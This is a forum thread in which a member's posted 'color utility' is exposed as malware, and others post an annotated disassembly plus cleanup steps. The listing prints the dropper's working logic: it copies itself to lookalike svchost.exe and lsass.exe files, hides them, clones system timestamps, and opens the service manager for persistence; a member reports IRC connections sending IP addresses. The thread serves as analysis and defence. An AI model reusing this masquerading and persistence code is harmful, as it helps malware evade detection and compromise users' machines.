
My first utility

Started by q4lambda, June 28, 2006, 09:37:19 AM


q4lambda

Check out my awesome color utility:
[removed]

Made it yesterday with masm. What do you think?

TNick

Doesn't work for me. (Windows XP Home edition). No activity in Task Manager.
Don't have time to debug. Maybe later.

white scorpion

damn!!! keep your junk off this site!


; Analyst notes (review): OllyDbg listing of the routine at 00401727 in the posted "colors" binary.
; The text after ';' on each instruction is the debugger's own argument annotation; the lines
; beginning with ';' alone are reviewer notes on what the visible calls do.
;
; Entry check: calls an internal routine (00401ECC) with (1, buffer 004049BF) and skips the whole
; install sequence below (JE 004019CE) when it returns 1. Presumably an "already installed" test;
; confirm by inspecting 00401ECC, which is not in this listing.
00401727 >/$ 68 BF494000    PUSH colors.004049BF                     ; /Arg2 = 004049BF
0040172C  |. 6A 01          PUSH 1                                   ; |Arg1 = 00000001
0040172E  |. E8 99070000    CALL colors.00401ECC                     ; \colors.00401ECC
00401733  |. 83F8 01        CMP EAX,1
00401736  |. 0F84 92020000  JE colors.004019CE
; Own path: hModule = NULL means GetModuleFileNameA writes the running executable's path into
; 004049BF. That same buffer is the ExistingFileName of both CopyFileA calls below, so the
; program is copying itself (the debugger shows the buffer as "" only because it is empty at
; static-analysis time).
0040173C  |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
00401741  |. 68 BF494000    PUSH colors.004049BF                     ; |PathBuffer = colors.004049BF
00401746  |. 6A 00          PUSH 0                                   ; |hModule = NULL
00401748  |. E8 13070000    CALL <JMP.&kernel32.GetModuleFileNameA>  ; \GetModuleFileNameA
; Drop #1: strip attributes and delete any existing c:\windows\svchost.exe, copy self there,
; then mark it HIDDEN|SYSTEM (6). The path is %windir%, not system32 — a lookalike of the
; legitimate svchost.exe. Cleanup note: because SYSTEM is set as well as HIDDEN, clearing the
; attributes needs both -h and -s (attrib -h alone leaves the file protected). None of the
; return values (SetFileAttributesA/DeleteFileA/CopyFileA) are checked.
0040174D  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
0040174F  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
00401754  |. E8 2B070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
00401759  |. 68 C2404000    PUSH colors.004040C2                     ; /FileName = "c:\windows\svchost.exe"
0040175E  |. E8 D3060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401763  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401765  |. 68 C2404000    PUSH colors.004040C2                     ; |NewFileName = "c:\windows\svchost.exe"
0040176A  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
0040176F  |. E8 AA060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
00401774  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
00401776  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
0040177B  |. E8 04070000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
; Drop #2: identical sequence for c:\windows\lsass.exe (again a lookalike of a system32 binary).
00401780  |. 6A 02          PUSH 2                                   ; /FileAttributes = HIDDEN
00401782  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401787  |. E8 F8060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
0040178C  |. 68 DE404000    PUSH colors.004040DE                     ; /FileName = "c:\windows\lsass.exe"
00401791  |. E8 A0060000    CALL <JMP.&kernel32.DeleteFileA>         ; \DeleteFileA
00401796  |. 6A 00          PUSH 0                                   ; /FailIfExists = FALSE
00401798  |. 68 DE404000    PUSH colors.004040DE                     ; |NewFileName = "c:\windows\lsass.exe"
0040179D  |. 68 BF494000    PUSH colors.004049BF                     ; |ExistingFileName = ""
004017A2  |. E8 77060000    CALL <JMP.&kernel32.CopyFileA>           ; \CopyFileA
004017A7  |. 6A 06          PUSH 6                                   ; /FileAttributes = HIDDEN|SYSTEM
004017A9  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
004017AE  |. E8 D1060000    CALL <JMP.&kernel32.SetFileAttributesA>  ; \SetFileAttributesA
; Timestamp cloning: opens the legitimate c:\windows\system32\svchost.exe read-only and reads its
; Creation/LastAccess/LastWrite times into 00404B50/00404B58/00404B60. The "hFile = NULL" annotations
; are the debugger's static view; at run time the handle is whatever OpenFile returned (stored at
; 404AC4 by the MOV). OpenFile's result is not checked for failure before use.
004017B3  |. 6A 00          PUSH 0                                   ; /Mode = OF_READ|OF_SHARE_COMPAT
004017B5  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017BA  |. 68 F8404000    PUSH colors.004040F8                     ; |FileName = "c:\windows\system32\svchost.exe"
004017BF  |. E8 AE060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017C4  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
004017C9  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
004017CE  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
004017D3  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
004017D8  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
004017DE  |. E8 71060000    CALL <JMP.&kernel32.GetFileTime>         ; \GetFileTime
004017E3  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
004017E9  |. E8 2A060000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
; ...then writes those same three times onto both dropped copies, so the new files do not stand
; out by date next to the real system binaries. For triage, compare the copies' timestamps with
; the directory's own change history rather than trusting the file times.
004017EE  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
004017F0  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
004017F5  |. 68 C2404000    PUSH colors.004040C2                     ; |FileName = "c:\windows\svchost.exe"
004017FA  |. E8 73060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
004017FF  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
00401804  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401809  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
0040180E  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
00401813  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401819  |. E8 6C060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
0040181E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
00401824  |. E8 EF050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
00401829  |. 6A 01          PUSH 1                                   ; /Mode = OF_WRITE|OF_SHARE_COMPAT
0040182B  |. 68 C84A4000    PUSH colors.00404AC8                     ; |pOfstruct = colors.00404AC8
00401830  |. 68 DE404000    PUSH colors.004040DE                     ; |FileName = "c:\windows\lsass.exe"
00401835  |. E8 38060000    CALL <JMP.&kernel32.OpenFile>            ; \OpenFile
0040183A  |. A3 C44A4000    MOV DWORD PTR DS:[404AC4],EAX
0040183F  |. 68 604B4000    PUSH colors.00404B60                     ; /pLastWrite = colors.00404B60
00401844  |. 68 584B4000    PUSH colors.00404B58                     ; |pLastAccess = colors.00404B58
00401849  |. 68 504B4000    PUSH colors.00404B50                     ; |pCreationTime = colors.00404B50
0040184E  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; |hFile = NULL
00401854  |. E8 31060000    CALL <JMP.&kernel32.SetFileTime>         ; \SetFileTime
00401859  |. FF35 C44A4000  PUSH DWORD PTR DS:[404AC4]               ; /hObject = NULL
0040185F  |. E8 B4050000    CALL <JMP.&kernel32.CloseHandle>         ; \CloseHandle
; Internal routine 00402080 is called once per dropped file with the strings " 1" and " 2";
; its body is not in this listing, so what it does with the paths cannot be read off here.
00401864  |. 68 DB404000    PUSH colors.004040DB                     ;  ASCII " 1"
00401869  |. 68 C2404000    PUSH colors.004040C2                     ;  ASCII "c:\windows\svchost.exe"
0040186E  |. E8 0D080000    CALL colors.00402080
00401873  |. 68 F5404000    PUSH colors.004040F5                     ;  ASCII " 2"
00401878  |. 68 DE404000    PUSH colors.004040DE                     ;  ASCII "c:\windows\lsass.exe"
0040187D  |. E8 FE070000    CALL colors.00402080
; OpenSCManagerA(lpMachineName = 0, lpDatabaseName = 0, dwDesiredAccess = 2); access 2 is
; SC_MANAGER_CREATE_SERVICE, consistent with the later report in this thread that the dropped
; files are registered as services. The listing is cut here, so the service setup itself is not
; visible. Persistence check for responders: look for services whose image path points at
; %windir%\svchost.exe or %windir%\lsass.exe rather than system32.
00401882  |. 6A 02          PUSH 2
00401884  |. 6A 00          PUSH 0
00401886  |. 6A 00          PUSH 0
00401888  |. E8 83090000    CALL <JMP.&advapi32.OpenSCManagerA>


and a whole lot more where that came from...
Don't open this program!

TNick

I will have time to debug from now on. :(

zooba

Quote from: TNick on June 28, 2006, 11:37:43 AM
I will have time to debug from now on. :(

If your computer is still on you should be fine :wink

Windows XP has a lot of hoops to jump through to be able to do this stuff, and the only one he's made it through is getting the code onto the computer  :naughty: :cheekygreen:

All the same, I hope this results in the banning of an IP or something similar...

Cheers,

Zooba :U

white scorpion

open registry editor and search for c:\windows\lsass.exe & c:\windows\svchost.exe
remove those keys.
The original files are in C:\windows\system32\

Then reboot and remove c:\windows\lsass.exe & c:\windows\svchost.exe
both are hidden so you might want to use attrib -h first.
I haven't gone through the rest of the code since I'm at work now, but if you still need help then let me know.

@TNick, i know how you feel, i feel the same way. But you might want to change your post a little since it's not allowed on the board  :(

zooba

Having had a look through most of the code, it seems to register some fake services (probably the two files you suggested, Scorpion) to connect to IRC and send IP addresses. Admittedly, I haven't used some of the APIs in there before so I don't know exactly what they do, but this is definitely bound to be removed once the mods arrive.

hutch--


white scorpion